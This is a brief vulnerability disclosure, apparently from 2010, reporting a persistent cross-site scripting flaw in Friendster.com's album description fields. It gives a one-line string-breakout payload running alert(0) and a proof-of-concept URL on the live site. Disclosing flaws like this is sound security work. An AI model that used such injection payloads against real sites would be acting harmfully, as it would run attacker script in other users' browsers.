#==================================================================================================# # # # $$$$$$$\ $$\ $$\ $$\ $$$$$$\ # # $$ __$$\ \__| $$ | $$ | $$ __$$\ # # $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ / $$ | # # $$$$$$$\ |$$ |$$ _____|$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ | $$$$$$$$ | # # $$ __$$\ $$ |\$$$$$$\ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # # $$ | $$ |$$ | \____$$\ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # # $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | $$ |\$$$$$$ |$$ | $$ | $$ | # # \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # # $$ | # # $$ | Plastics Make It Possible # # \__| # # # #==================================================================================================# # # # Vulnerability............Persistent XSS # # Software.................Friendster.com # # Date.....................5/2/10 # # # #==================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #==================================================================================================# # # # ##Description## # # # # Album description and a few other fields not properly escaped before being rendered into # # javascript. # # # # # # ##Exploit## # # # # \";alert(0);// # # # # # # ##Proof of Concept## # # # # http://www.friendster.com/viewalbums.php?uid=120927091 # # # #==================================================================================================#